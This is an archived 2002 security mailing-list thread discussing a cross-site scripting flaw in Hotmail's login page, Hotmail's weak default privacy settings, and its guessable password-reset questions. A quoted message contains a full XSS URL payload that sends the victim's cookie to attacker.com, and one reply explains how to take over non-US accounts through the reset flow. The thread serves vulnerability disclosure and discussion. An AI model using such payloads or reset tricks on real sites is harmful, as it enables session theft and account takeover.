Re: XSS bug in hotmail login page

["Inderjeet S Sodhi" <adaimages () hotmail com>]

Hi Everyone,
MSN passport (read Microsoft)'s basic mentality itself about security is
very insecure. In November 2001 and april 2002, when some security bugs were
mentioned, MSN did patch some of their systems. But surprisingly, we found
many of the systems still used the buggy techniques, say, Javascript, within
their own pages. Even as today, when one opens MSN Hotmail in IE6, it many a
times says Script Error (or something similar). Can't they make their own
mail system compatible with their own Browser?

Other issues we observed but kept silent were:
a) When MS transitioned from MS hotmail to MSN hotmail, they reset all
users' options to somewhat insecure settings. I am unaware if any warning or
alert was sent before doing so. The settings affected were (still are, and
maybe are default settings for new accounts):

            (Under Personal Profile...)
                1. Share my e-mail address.

                2. Share my first and last names.

                3. Share my other registration information.
                        The above three options are enabled by default. I
assume that these maybe a prime source of leaking informatin to spammers,
besides other security risks. If you have these options enabled, Disable
them NOW!

              (Under Other Options...)
                4. Session Expiration is set to NEVER. Probably, if session
expiration is
set to the minimum available 2 hours, chances of others getting into your
hotmail
accounts become less.

B) The change password policy: Hotmails Reset Password option can be used by
any user, as long as the account holder is not in the US, that is, his/her
location is not set at US. This is because when the "forgot password" option
is invoked (and a secret question is present in the database), the next step
asks for the username and country. If the country is not US, then a third
field, ZIP CODE is skipped and the secret question page is shown. Of course
one has to know the answer to the question but then, MS has provided enough
freedom to users to type in any question they like. During our research, we
found questions like "How are you?" and "Whom do you love most?". Anyone's
guess, we found answers to be like "Fine" (or "Bad" or "Not Good") and "me"
("or myself" or "my lover") respectively. The answers in brackets are the
next-possible-answers but we could guess, at the most, in second attempt
only.

Time to change hotmail policies??

With warms regards and best wishes.

Inderjeet S Sodhi
Infotech Consultant, E-Security and S/W Solution Provider,
Web Designer and Beta Tester.


----- Original Message -----
From: "Russell Harding" <hardingr () cunap com>
To: "Thor Larholm" <Thor () jubii dk>
Sent: Tuesday, October 08, 2002 12:20 PM
Subject: RE: XSS bug in hotmail login page


> Hello, comments below:
>
> On Mon, 7 Oct 2002, Thor Larholm wrote:
>
> > It's very simple, you can inject arbitrary scripting to be executed by
the
> > user in the context of hotmail. This means that you can e.g. steal his
> > cookies or, if he's logged in, write emails from his account, delete his
> > mails and change his password.
>
>   I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
> from GET requests.  While you can view your own cookies easily, I'm not
> sure if you can still exploit this bug.  I do know filtering these
> characters prevents this sort of attack:
http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";><sc
ript>document.location.replace('http://attacker.com/steal.cgi?'+document.coo
kie);</script>&ct=1033054530&_setlang=
> Is there another way to exploit this which I am not seeing? Or does MSN
> actually have their act together (in this particular case...)?
>
>        -Russell
>
> P.S. Well, I suppose the real question may be this:
> Is there a way to concatenate javascript strings without "+" or "%2B"?
>
>
>
> On Mon, 7 Oct 2002, Thor Larholm wrote:
>
> > > From: Peter Rdam [mailto:hell () weedmail com]
> > > They didnt reacted, and im pretty curious about what
> > > is possible with the bug. And i actually hope that
> > > someone can tell me about it and maybe Microsoft will
> > > do something about it..
> >
> > It's very simple, you can inject arbitrary scripting to be executed by
the
> > user in the context of hotmail. This means that you can e.g. steal his
> > cookies or, if he's logged in, write emails from his account, delete his
> > mails and change his password.
> >
> >
> >
> > Regards
> > Thor Larholm
> > Jubii A/S - Internet Programmer